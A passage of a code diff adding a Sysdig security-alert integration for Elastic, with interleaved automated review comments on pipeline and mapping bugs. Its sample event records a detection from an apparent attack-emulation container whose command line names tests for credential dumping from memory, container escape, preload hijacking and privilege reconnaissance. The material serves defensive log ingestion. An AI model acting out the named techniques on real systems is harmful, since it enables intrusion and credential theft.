"nginx-76f9cf7469-k5kf7", + "timestamp": 1606322948648718268, + "timestampRFC3339Nano": "2020-11-25T16:49:08.648718268Z", + "type": "kubernetes" + } + } + ] +} \ No newline at end of file diff --git a/packages/sysdig/data_stream/alerts/_dev/test/system/test-default-config.yml b/packages/sysdig/data_stream/alerts/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..850d99a2caf --- /dev/null +++ b/packages/sysdig/data_stream/alerts/_dev/test/system/test-default-config.yml @@ -0,0 +1,12 @@ +service: sysdig-alerts-http +service_notify_signal: SIGHUP +input: http_endpoint +vars: ~ +data_stream: + vars: + listen_port: 9035 + listen_address: 0.0.0.0 + preserve_original_event: true +wait_for_data_timeout: 180s +assert: + hit_count: 15 
diff --git a/packages/sysdig/data_stream/alerts/agent/stream/http.yml.hbs b/packages/sysdig/data_stream/alerts/agent/stream/http.yml.hbs
new file mode 100644
index 00000000000..dad2fb22c35
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/agent/stream/http.yml.hbs
@@ -0,0 +1,32 @@
+listen_address: {{listen_address}}
+listen_port: {{listen_port}}
+url: {{url}}
+{{#if ssl}}
+ssl: {{ssl}}
+{{/if}}
+{{#if secret_header}}
+secret.header: {{secret_header}}
+{{/if}}
+{{#if secret_value}}
+secret.value: {{secret_value}}
+{{/if}}
+{{#if preserve_original_event}}
+preserve_original_event: true
+{{/if}}
+{{#if enable_request_tracer}}
+tracer.filename: "../../logs/http_endpoint/http-request-trace-*.ndjson"
+tracer.maxbackups: 5
+{{/if}}
+tags:
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+processors:
+ - add_locale: ~
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
\ No newline at end of file
diff --git a/packages/sysdig/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/sysdig/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..0c93b5a9d6e
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml
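Review bot: The template emits a top-level `processors:` key twice whenever the `processors` variable is set — once for the fixed `add_locale` entry and again inside `{{#if processors}}` — which is a duplicate mapping key in the rendered YAML and, depending on the parser, either fails to load or lets the second block silently discard `add_locale`. Keep a single key and let the user-supplied list continue under it: `processors:` / `  - add_locale: ~` / `{{#if processors}}{{processors}}{{/if}}`, with the `{{#if}}` block split over its own lines as the existing one is. The `publisher_pipeline.disable_host` block between the two can stay where it is.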
@@ -0,0 +1,293 @@
+---
+description: Pipeline for mapping Sysdig fields to ECS / sysdig-namespaced fields
+processors:
+- set:
+ field: event.kind
+ value: 'alert'
+- json:
+ field: message
+ target_field: json
+ if: ctx.message != null
+- rename:
+ field: json
+ target_field: sysdig
+- dot_expander:
+ field: '*'
+ path: sysdig.content
+ tag: 'Primary doc_expander for sysdig.content'
+ ignore_failure: true
+- dot_expander:
+ field: '*'
+ path: sysdig.labels
+ tag: 'Primary doc_expander for sysdig.labels'
+ ignore_failure: true
+- set:
+ field: event.id
+ copy_from: sysdig.id
+ ignore_empty_value: true
+- set:
+ field: event.provider
+ copy_from: sysdig.source
+ ignore_empty_value: true
+- set:
+ field: event.severity
+ copy_from: sysdig.severity
+ ignore_empty_value: true
+- set:
+ field: log.syslog.severity.code
+ copy_from: sysdig.severity
+ ignore_empty_value: true
+- set:
+ field: log.syslog.severity.name
+ value: "emergency"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 0"
+- set:
+ field: log.syslog.severity.name
+ value: "alert"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 1"
+- set:
+ field: log.syslog.severity.name
+ value: "critical"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 2"
+- set:
+ field: log.syslog.severity.name
+ value: "error"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 3"
+- set:
+ field: log.syslog.severity.name
+ value: "warning"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 4"
+- set:
+ field: log.syslog.severity.name
+ value: "notice"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 5"
+- set:
+ field: log.syslog.severity.name
+ value: "informational"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 6"
+- set:
+ field: log.syslog.severity.name
+ value: "debug"
+ if: "ctx.sysdig?.severity != null && ctx.sysdig.severity == 7"
+- set:
+ field: rule.author
+ value: ["{{sysdig.content.policyOrigin}}"]
+ ignore_empty_value: true
+- set:
+ field: rule.name
+ copy_from: sysdig.content.ruleName
+ ignore_empty_value: true
+- convert:
+ target_field: rule.version
+ field: sysdig.content.policyVersion
+ type: string
+ ignore_missing: true
+- set:
+ field: rule.category
+ copy_from: sysdig.content.ruleType
+ ignore_empty_value: true
+- set:
+ field: rule.ruleset
+ copy_from: sysdig.name
+ ignore_empty_value: true
+- set:
+ field: sysdig.event.description
+ copy_from: sysdig.description
+ ignore_empty_value: true
+- set:
+ field: sysdig.event.category
+ copy_from: sysdig.category
+ ignore_empty_value: true
+- set:
+ field: sysdig.event.type
+ copy_from: sysdig.type
+ ignore_empty_value: true
+- set:
+ field: tags
+ copy_from: sysdig.content.ruleTags
+ ignore_empty_value: true
+- convert:
+ target_field: agent.id
+ field: sysdig.agentId
+ type: string
+ ignore_missing: true
+- set:
+ field: host.id
+ copy_from: sysdig.machineId
+ ignore_empty_value: true
+- append:
+ field: host.mac
+ value: "{{{sysdig.hostMac}}}"
+ if: ctx.sysdig?.hostMac != null
+- gsub:
+ field: host.mac
+ pattern: '[-:.]'
+ replacement: '-'
+ ignore_missing: true
+- uppercase:
+ field: host.mac
+ ignore_missing: true
+- set:
+ field: host.name
+ copy_from: sysdig.labels.host.hostName
+ ignore_empty_value: true
+- set:
+ field: container.id
+ copy_from: sysdig.containerId
+ ignore_empty_value: true
+- set:
+ field: container.image.tag
+ copy_from: sysdig.content.fields.container.image.tag
+ ignore_empty_value: true
+- set:
+ field: container.image.name
+ copy_from: sysdig.content.fields.container.name
+ ignore_empty_value: true
+- set:
+ field: rule.ruleset
+ copy_from: sysdig.name
+ ignore_empty_value: true
+- set:
+ field: message
+ copy_from: sysdig.content.output
+ ignore_empty_value: true
+- set:
+ field: process.executable
+ copy_from: sysdig.content.fields.proc.exepath
+ ignore_empty_value: true
+- set:
+ field: process.working_directory
+ copy_from: sysdig.content.fields.proc.cwd
+ ignore_empty_value: true
+- set:
+ field: 
process.pid
+ copy_from: sysdig.content.fields.proc.pid
+ ignore_empty_value: true
+- set:
+ field: process.name
+ copy_from: sysdig.content.fields.proc.name
+ ignore_empty_value: true
+- set:
+ field: process.command_line
+ copy_from: sysdig.content.fields.proc.cmdline
+ ignore_empty_value: true
+- set:
+ field: process.parent.pid
+ copy_from: sysdig.content.fields.proc.ppid
+ ignore_empty_value: true
+- set:
+ field: process.parent.name
+ copy_from: sysdig.content.fields.proc.pname
+ ignore_empty_value: true
+- set:
+ field: process.parent.command_line
+ copy_from: sysdig.content.fields.proc.pcmdline
+ ignore_empty_value: true
+- set:
+ field: user.id
+ copy_from: sysdig.content.fields.user.uid
+ ignore_empty_value: true
+- set:
+ field: user.name
+ copy_from: sysdig.content.fields.user.name
+ ignore_empty_value: true
+- script:
+ lang: painless
+ tag: 'painless_set_threat_technique_id'
+ if: ctx.sysdig?.content?.ruleTags != null
+ source: |
+ def mitreRegex = /T\d{4}/;
+ for (int i = 0; i < ctx.sysdig.content.ruleTags.length; i++) {
+ def tag = ctx.sysdig.content.ruleTags[i];
+ def matcher = mitreRegex.matcher(tag);
+ if (matcher.find()) {
+ ctx['threat.technique.id'] = [matcher.group()];
+ break;
+ }
+ }
+- set:
+ field: cloud.account.id
+ copy_from: sysdig.labels.cloudProvider.account.id
+ ignore_empty_value: true
+- set:
+ field: cloud.availability_zone
+ copy_from: sysdig.labels.gcp.availabilityZone
+ ignore_empty_value: true
+ if: ctx.sysdig?.labels?.cloudProvider?.name != null && ctx.sysdig?.labels?.cloudProvider?.name == "gcp"
+- set:
+ field: cloud.instance.id
+ copy_from: sysdig.labels.gcp.instanceId
+ ignore_empty_value: true
+ if: ctx.sysdig?.labels?.gcp?.instanceId != null
+- set:
+ field: cloud.instance.id
+ copy_from: sysdig.labels.azure.instanceId
+ ignore_empty_value: true
+ if: ctx.sysdig?.labels?.azure?.instanceId != null
+- set:
+ field: cloud.instance.name
+ copy_from: sysdig.labels.gcp.instanceName
+ ignore_empty_value: true
+ if: 
ctx.sysdig?.labels?.gcp?.instanceName != null
+- set:
+ field: cloud.instance.name
+ copy_from: sysdig.labels.gcp.instanceName
+ ignore_empty_value: true
+ if: ctx.sysdig?.labels?.azure?.instanceName != null
+- set:
+ field: cloud.machine.type
+ copy_from: sysdig.labels.gcp.machineType
+ ignore_empty_value: true
+ if: ctx.sysdig?.labels?.gcp?.machineType != null
+- set:
+ field: cloud.machine.type
+ copy_from: sysdig.labels.azure.instanceSize
+ ignore_empty_value: true
+ if: ctx.sysdig?.labels?.azure?.instanceSize != null
+- set:
+ field: cloud.project.id
+ copy_from: sysdig.labels.gcp.projectId
+ ignore_empty_value: true
+- set:
+ field: cloud.project.name
+ copy_from: sysdig.labels.gcp.projectName
+ ignore_empty_value: true
+- set:
+ field: cloud.provider
+ copy_from: sysdig.labels.cloudProvider.name
+ ignore_empty_value: true
+- set:
+ field: cloud.region
+ copy_from: sysdig.labels.cloudProvider.region
+ ignore_empty_value: true
+- set:
+ field: orchestrator.cluster.name
+ copy_from: sysdig.labels.kubernetes.cluster.name
+ ignore_empty_value: true
+- set:
+ field: orchestrator.namespace
+ copy_from: sysdig.labels.kubernetes.namespace.name
+ ignore_empty_value: true
+- set:
+ field: orchestrator.resource.name
+ copy_from: sysdig.labels.kubernetes.pod.name
+ ignore_empty_value: true
+- set:
+ field: orchestrator.resource.parent.type
+ copy_from: sysdig.labels.kubernetes.workload.type
+ ignore_empty_value: true
+- set:
+ field: orchestrator.type
+ value: kubernetes
+ if: >-
+ ctx.sysdig?.labels?.kubernetes?.cluster?.name != null ||
+ ctx.sysdig?.labels?.kubernetes?.namespace?.name != null ||
+ ctx.sysdig?.labels?.kubernetes?.pod?.name != null ||
+ ctx.sysdig?.labels?.kubernetes?.workload?.type != null
+on_failure:
+- append:
+ field: error.message
+ value: 'Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}"'
+- 
set:
+ field: event.kind
+ value: pipeline_error
\ No newline at end of file
diff --git a/packages/sysdig/data_stream/alerts/fields/base-fields.yml b/packages/sysdig/data_stream/alerts/fields/base-fields.yml
new file mode 100644
index 00000000000..72b280dd8a5
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/fields/base-fields.yml
@@ -0,0 +1,24 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+ value: 'logs'
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+ value: 'sysdig.alerts'
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.dataset
+ type: constant_keyword
+ description: Data stream / event dataset.
+ value: 'sysdig.alerts'
+- name: event.module
+ type: constant_keyword
+ description: The module the event belongs to.
+ value: sysdig
+- name: input.type
+ type: constant_keyword
+- name: '@timestamp'
+ type: date
+ description: Event timestamp with nanos.
diff --git a/packages/sysdig/data_stream/alerts/fields/fields.yml b/packages/sysdig/data_stream/alerts/fields/fields.yml
new file mode 100644
index 00000000000..498f7734245
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/fields/fields.yml
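Review bot: The `process.*`, `user.*` and `container.image.*` set processors copy from nested paths under `sysdig.content.fields`, but the `dot_expander` with `path: sysdig.content` only expands that object's own top-level keys, so `proc.*` and `user.*` remain literal dotted keys and those processors silently find nothing — the expected document at L54 still carries `"proc.cmdline"` as a dotted key and the events at L57–L60 have no `process` or `user` object at all; a second `dot_expander` on `sysdig.content.fields` (below) is needed ahead of those processors. The second `cloud.instance.name` processor is guarded by `ctx.sysdig?.labels?.azure?.instanceName != null` yet copies from `sysdig.labels.gcp.instanceName`; it should read `copy_from: sysdig.labels.azure.instanceName`. `rule.author` is built from a templated list, so `ignore_empty_value` never applies and events without `policyOrigin` end up with `"author": [""]` (visible at L61); replace that option with `if: ctx.sysdig?.content?.policyOrigin != null`. The `rule.ruleset` set processor is also present twice and the second copy can be dropped.
```yaml
# … unchanged: existing dot_expander for sysdig.content …
- dot_expander:
    field: '*'
    path: sysdig.content.fields
    tag: 'Primary doc_expander for sysdig.content.fields'
    ignore_failure: true
# … unchanged: dot_expander for sysdig.labels and the set processors that follow …
```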
@@ -0,0 +1,176 @@
+- name: sysdig
+ type: group
+ description: Namespace for Sysdig-specific fields.
+ dynamic: false
+ fields:
+ - name: actions
+ type: flattened
+ - name: agentId
+ type: integer
+ description: Agent identifier
+ - name: category
+ type: keyword
+ description: Event category from Sysdig
+ - name: containerId
+ type: text
+ description: Identifier of the container
+ - name: content
+ type: group
+ dynamic: false
+ description: Preserved Sysdig fields
+ fields:
+ - name: fields
+ type: group
+ dynamic: false
+ fields:
+ - name: container.image.tag
+ type: text
+ description: Tag for the container image
+ - name: container.name
+ type: text
+ description: Name of the container
+ - name: proc.exepath
+ type: text
+ description: Path for the current process
+ - name: proc.cwd
+ type: text
+ description: Current working directory for the current process
+ - name: proc.pid
+ type: text
+ description: Identifier for the process
+ - name: proc.name
+ type: text
+ description: Name of the process
+ - name: proc.cmdline
+ type: text
+ description: Command line args for the process
+ - name: proc.ppid
+ type: text
+ description: Identifier for the parent process
+ - name: proc.pname
+ type: text
+ description: Name of the parent process
+ - name: proc.pcmdline
+ type: text
+ description: Command line args for the parent process
+ - name: user.uid
+ type: text
+ description: Identifier for the user
+ - name: user.name
+ type: text
+ description: Name of the user
+ - name: output
+ type: text
+ description: The raw event output
+ - name: policyOrigin
+ type: text
+ description: Originator of the rule associated with an event
+ - name: policyVersion
+ type: integer
+ description: Version of the rule associated with an event
+ - name: ruleName
+ type: text
+ description: Name of the rule associated with an event
+ - name: ruleTags
+ type: text
+ description: Tags associated with an event rule
+ - name: ruleType
+ type: text
+ description: Category of the rule associated with an event
+ - name: description
+ type: text
+ description: Description of the event policy
+ - name: event
+ type: group
+ description: Fields specific to the actual event details
+ dynamic: false
+ fields:
+ - name: description
+ type: text
+ - name: category
+ type: text
+ - name: type
+ type: text
+ - name: hostMac
+ type: text
+ description: MAC address of the host machine
+ - name: id
+ type: text
+ description: Event identifier
+ - name: labels
+ type: group
+ dynamic: false
+ fields:
+ - name: azure.instanceId
+ type: text
+ description: Instance identifier for the azure instance
+ - name: azure.instanceName
+ type: text
+ description: Instance name for the azure instance
+ - name: azure.instanceSize
+ type: text
+ description: Size for the azure instance
+ - name: cloudProvider.account.id
+ type: text
+ description: Account identifier for the cloud provider
+ - name: cloudProvider.name
+ type: text
+ description: Name for the cloud provider
+ - name: cloudProvider.region
+ type: text
+ description: Region for the cloud provider
+ - name: host.hostName
+ type: keyword
+ description: Name of the current host
+ - name: gcp.availabilityZone
+ type: text
+ description: AZ for the gcp instance
+ - name: gcp.instanceId
+ type: text
+ description: Instance identifier for the gcp instance
+ - name: gcp.instanceName
+ type: text
+ description: Instance name for the gcp instance
+ - name: gcp.machineType
+ type: text
+ description: Machine type for the gcp instance
+ - name: gcp.projectId
+ type: text
+ description: Project identifier for the gcp instance
+ - name: gcp.projectName
+ type: text
+ description: Project name for the gcp instance
+ - name: kubernetes.cluster.name
+ type: text
+ description: Name of the k8s cluster
+ - name: kubernetes.namespace.name
+ type: text
+ description: Namespace of the k8s cluster
+ - name: kubernetes.pod.name
+ type: text
+ description: Name of the k8s pod
+ - name: kubernetes.workload.type
+ type: text
+ description: Type of k8s resource
+ - name: machineId
+ type: text
+ description: Identifier of the host machine
+ - name: name
+ type: text
+ description: Name of the event policy
+ - name: originator
+ type: text
+ - name: severity
+ type: integer
+ description: Numerical severity value associated with an event
+ - name: source
+ type: text
+ description: Event source
+ - name: timestamp
+ type: date
+ description: Timestamp of the event
+ - name: timestampRFC3339Nano
+ type: date
+ - name: type
+ type: text
+ description: In the case of policies, value should come through as "policy"
diff --git a/packages/sysdig/data_stream/alerts/manifest.yml b/packages/sysdig/data_stream/alerts/manifest.yml
new file mode 100644
index 00000000000..135192178c8
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/manifest.yml
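Review bot: `sysdig.timestamp` is declared `type: date` near the end of the hunk, but the sample event in this same diff carries it as the bare integer `1720031001639981000`, i.e. epoch nanoseconds; Elasticsearch's default date format reads an integer as epoch milliseconds, so the indexed value lands some tens of millions of years in the future instead of at the event time. Since the same instant already arrives as `timestampRFC3339Nano`, the simplest fix is `type: long` for `timestamp` with `description: Timestamp of the event in epoch nanoseconds`, or convert it in the pipeline before indexing. Separately, identifier-like values such as `containerId`, `proc.pid`, `user.uid`, `hostMac`, `machineId`, `id`, the `labels.*.instanceId` fields and `ruleTags` are mapped as `text`, which is analyzed and cannot be used for exact-match filters, aggregations or the dashboard's options-list controls; `keyword` is the usual mapping for these in other integrations and is what makes them usable as pivot fields in detection rules.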
@@ -0,0 +1,89 @@
+title: "Sysdig"
+type: logs
+streams:
+ - input: http_endpoint
+ enabled: false
+ template_path: http.yml.hbs
+ title: HTTP input
+ description: Collect Sysdig Alerts over an HTTP Webhook
+ vars:
+ - name: listen_address
+ type: text
+ title: Listen Address
+ description: |
+ Bind address for the HTTP listener. Use 0.0.0.0 to listen on all interfaces.
+ required: true
+ show_user: true
+ default: localhost
+ - name: listen_port
+ type: text
+ title: Listen port
+ description: |
+ Bind port for the listener.
+ required: true
+ show_user: true
+ default: 9035
+ - name: url
+ type: text
+ title: URL
+ description: This options specific which URL path to accept requests on. Defaults to /.
+ required: false
+ show_user: true
+ - name: secret_header
+ type: text
+ title: Secret Header
+ description: The header to check for a specific value specified by `secret.value`.
+ required: false
+ show_user: false
+ secret: false
+ - name: secret_value
+ type: password
+ title: Secret Value
+ description: The secret stored in the header name specified by `secret.header`.
+ required: false
+ show_user: false
+ secret: true
+ - name: ssl
+ type: yaml
+ title: TLS
+ description: Options for enabling TLS for the listening webhook endpoint. See the [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/configuration-ssl.html) for a list of all options.
+ multi: false
+ required: false
+ show_user: false
+ default: |
+ # enabled: false
+ # certificate: "/etc/pki/client/cert.pem"
+ # key: "/etc/pki/client/cert.key"
+ - name: preserve_original_event
+ type: bool
+ title: Preserve Original Event
+ description: This option copies the raw unmodified body of the incoming request to the event.original field as a string before sending the event to Elasticsearch.
+ required: false
+ show_user: true
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: |
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - name: tags
+ type: text
+ title: Tags
+ description: Tags to include in the published event
+ required: false
+ default:
+ - forwarded
+ - sysdig-alerts
+ multi: true
+ show_user: true
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ The request tracer logs HTTP requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details.
diff --git a/packages/sysdig/data_stream/alerts/sample_event.json b/packages/sysdig/data_stream/alerts/sample_event.json
new file mode 100644
index 00000000000..e757c0927fc
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/sample_event.json
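Review bot: `secret_header`, `secret_value` and `ssl` are all optional and hidden (`show_user: false`), so a policy created from the defaults accepts any unauthenticated plaintext POST on the listener, and neither their descriptions nor the README in this diff says that the shared secret and TLS should be configured whenever `listen_address` is changed away from `localhost`; consider `show_user: true` for the two secret vars plus a sentence in their descriptions such as `Set both secret_header and secret_value so that only requests carrying the shared secret are accepted.` The `url` description has a typo; it should read `description: This option specifies which URL path to accept requests on. Defaults to /.` The `enable_request_tracer` description links to the CEL input's tracer documentation, while this stream uses the http_endpoint input, so the link should point at that input's page.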
@@ -0,0 +1,200 @@ +{ + "@timestamp": "2024-09-12T13:06:12.675Z", + "agent": { + "ephemeral_id": "fe172d2f-7b14-4b87-bc5a-acc14684e4c5", + "id": "58014837", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.14.1" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "data_stream": { + "dataset": "sysdig.alerts", + "namespace": "15372", + "type": "logs" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "a2d71da8-f67f-43fa-a895-0251c4a68bb0", + "snapshot": false, + "version": "8.14.1" + }, + "event": { + "agent_id_status": "mismatch", + "dataset": "sysdig.alerts", + "id": "17dec715376910362c8c3f62a4ceda2e", + "ingested": "2024-09-12T13:06:22Z", + "kind": "alert", + "provider": "syscall", + "severity": 7, + "timezone": "+00:00" + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "input": { + "type": "http_endpoint" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= 
container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "User Management Event Detected", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "userdel tmp_suid_user", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/sbin/userdel", + "proc.name": "userdel", + "proc.pcmdline": "pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)", + "proc.pid": "2140169", + "proc.pname": "pwsh", + "proc.ppid": "2140088", + "user.name": "root", + "user.uid": "0" + }, + "output": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= 
proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "User Management Event Detected", + "ruleTags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. 
Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec715376910362c8c3f62a4ceda2e", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720031001639981000, + "timestampRFC3339Nano": "2024-07-03T18:23:21.63998111Z", + "type": "policy" + }, + "tags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "threat.technique.id": [ + "T1136" + ] +} \ No newline at end of file 
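Review bot: `agent.id` is `"58014837"`, the same value as `sysdig.agentId`, and `event.agent_id_status` is `"mismatch"`, which suggests the pipeline (the relevant processor is not visible in this chunk) copies the Sysdig agent identifier into `agent.id` and overwrites the Elastic Agent's own id. `agent_id_status: mismatch` means the id in the document no longer matches the API key that wrote it, so this defeats Fleet's document-origin check and breaks per-agent attribution; the Sysdig value should stay in `sysdig.agentId` (or go to `observer.id`) rather than `agent.id`. Likewise `host.id` is set to the host MAC `42:01:0a:80:00:05`, which will not line up with the `host.id` other integrations report for the same machine, so correlation across sources by `host.id` will miss; if that fallback is intended it deserves a comment in the pipeline.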
diff --git a/packages/sysdig/docs/README.md b/packages/sysdig/docs/README.md new file mode 100644 index 00000000000..34f82f7b1f2 --- /dev/null +++ b/packages/sysdig/docs/README.md 
